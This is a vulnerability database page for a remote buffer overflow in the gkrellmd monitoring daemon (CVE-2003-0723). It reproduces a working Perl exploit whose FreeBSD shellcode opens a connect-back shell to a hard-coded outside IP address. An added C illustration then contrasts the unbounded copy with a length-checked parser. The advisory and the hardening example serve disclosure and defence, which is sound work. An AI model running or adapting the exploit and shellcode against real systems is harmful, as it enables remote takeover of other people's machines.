gkrellm gkrellmd Buffer Overflow Vulnerability

Vulnerability ID 1107395    Vulnerability type Buffer overflow
Published 2003-06-24    Updated 2003-10-20
CVE ID CVE-2003-0723
CNNVD ID CNNVD-200310-032
Platform FreeBSD    CVSS score 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/22832
https://www.securityfocus.com/bid/82747
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200310-032
|Vulnerability Details
Buffer overflow in gkrellmd in gkrellm 2.1.x before 2.1.14. A remote attacker can exploit it to execute arbitrary code.
|Exploit
source: http://www.securityfocus.com/bid/8022/info
 
GKrellMd has been reported prone to a remote buffer overflow vulnerability; arbitrary code execution is possible.

The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the size of the reserved memory buffer is received, arbitrary memory may be corrupted.

A remote attacker may exploit this issue to seize control of the affected daemon and execute arbitrary code.

This vulnerability has been reported to affect Gkrellm 2.1.13.

#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful instead
# shellcode by bighawk(i think) - wow this is badly formatted.

use IO::Socket;
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./DSR-geekrellm.pl <host> <port> (default gkrellmd is 19150)\n"; exit(-1); }

$host = $ARGV[0];
$port = $ARGV[1];
# return address for the FreeBSD 4.8 stack; pack "l" emits it as a 4-byte
# native-order (little-endian on x86) integer
$ret = pack("l",0xbfbffa60);
# FreeBSD/x86 connect-back shellcode: socket(), connect() to the ip:port
# encoded below, dup2() the socket over fds 0-2, then execve("/bin//sh")
$shellcode = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x26\x26\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";
#--> connect-back to a useless ip, change it:)                                     ^^217.157.38.38^        ^^10000^
$nop = "\x90";
# 128 bytes of padding to reach the saved return address, the address twice,
# a 500-byte NOP sled, then the shellcode
$buf = "A" x 128 . $ret x 2 . $nop x 500 . $shellcode;

$socket = new IO::Socket::INET
(
Proto    => "tcp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)\n" unless $socket;

print $socket "gkrellm 2.1.10\n"; #tell the daemon which client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;

close($socket);
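The bug class the advisory describes, as an added illustration that is not gkrellmd's source code and not part of the original page: a fixed-size line buffer filled from the network with no length check, beside a hardened handler that checks the received length before copying anything, plus a helper that constructs a line with the same layout as $buf in the Perl exploit above (128 bytes of padding, the return address 0xbfbffa60 twice, a 500-byte NOP sled, then a stand-in for shellcode) so the hardened parser can be shown rejecting it offline. The 128-byte buffer size, the exact "gkrellm <version>" greeting grammar and all function names are assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size, chosen to match the 128 bytes of padding the exploit
 * above uses; the page does not state gkrellmd's real buffer size. */
#define CLIENT_LINE_MAX 128

/* Vulnerable pattern (illustration, not gkrellmd's code): the client's
 * greeting line is copied into a fixed stack buffer with no check against
 * its length. A line of 128 bytes or more runs past buf and overwrites what
 * follows it on the stack, including the saved return address, which is what
 * the exploit's  "A" x 128 . $ret x 2  layout targets. Only call this with
 * short, trusted input; it exists here for comparison only. */
size_t hello_copy_unsafe(const char *net_line)
{
    char buf[CLIENT_LINE_MAX];
    strcpy(buf, net_line);              /* unbounded copy: the overflow */
    return strlen(buf);
}

/* Hardened version: the received length is checked before any copy, the
 * buffer is always NUL-terminated, and the version string is written with an
 * explicit output bound. Returns 0 on success, -1 if the data does not fit
 * (the caller should drop the client), -2 if it is not a "gkrellm <version>"
 * greeting. */
int hello_parse_safe(const char *net_data, size_t net_len,
                     char *version_out, size_t version_cap)
{
    char buf[CLIENT_LINE_MAX];
    const char *prefix = "gkrellm ";
    size_t plen = strlen(prefix);
    size_t vlen;

    if (net_data == NULL || version_out == NULL || version_cap == 0)
        return -2;
    if (net_len >= sizeof buf)          /* must leave room for the NUL */
        return -1;
    memcpy(buf, net_data, net_len);
    buf[net_len] = '\0';

    if (net_len > 0 && buf[net_len - 1] == '\n')   /* drop line terminator */
        buf[--net_len] = '\0';

    if (net_len <= plen || memcmp(buf, prefix, plen) != 0)
        return -2;
    vlen = net_len - plen;
    if (vlen >= version_cap)            /* would not fit the caller's buffer */
        return -1;
    memcpy(version_out, buf + plen, vlen);
    version_out[vlen] = '\0';
    return 0;
}

/* Constructed sample with the same layout as $buf in the exploit above:
 * 128 bytes of 'A', the return address twice in little-endian order (what
 * pack("l", ...) produces on x86), a 500-byte NOP sled, then 4 bytes standing
 * in for the shellcode. Returns the bytes written, or 0 if out is too small. */
size_t build_exploit_style_line(unsigned char *out, size_t cap)
{
    const uint32_t ret = 0xbfbffa60;    /* address used by the exploit */
    const size_t need = 128 + 2 * 4 + 500 + 4;
    size_t n, i;

    if (cap < need)
        return 0;
    memset(out, 'A', 128);
    n = 128;
    for (i = 0; i < 2; i++) {
        out[n++] = (unsigned char)(ret & 0xff);
        out[n++] = (unsigned char)((ret >> 8) & 0xff);
        out[n++] = (unsigned char)((ret >> 16) & 0xff);
        out[n++] = (unsigned char)((ret >> 24) & 0xff);
    }
    memset(out + n, 0x90, 500);         /* NOP sled */
    n += 500;
    memcpy(out + n, "\xcc\xcc\xcc\xcc", 4);   /* stand-in for shellcode */
    n += 4;
    return n;
}

int main(void)
{
    char version[32];
    unsigned char payload[1024];
    size_t len = build_exploit_style_line(payload, sizeof payload);
    int rc = hello_parse_safe("gkrellm 2.1.10\n", 15, version, sizeof version);

    printf("normal greeting -> %d, version \"%s\"\n", rc, version);
    printf("exploit-style line of %zu bytes -> %d\n", len,
           hello_parse_safe((const char *)payload, len, version, sizeof version));
    return 0;
}
```

The hardened handler rejects on the received length before touching the stack buffer, so the 640-byte exploit-style line is dropped with -1 instead of overwriting the return address; a genuine greeting such as "gkrellm 2.1.10\n" is accepted and its version extracted.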
|Affected Products
GKrellM GKrellM 2.1.7

GKrellM GKrellM 2.1.13

|References

Source: MANDRAKE
Name: MDKSA-2003:087
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2003:087
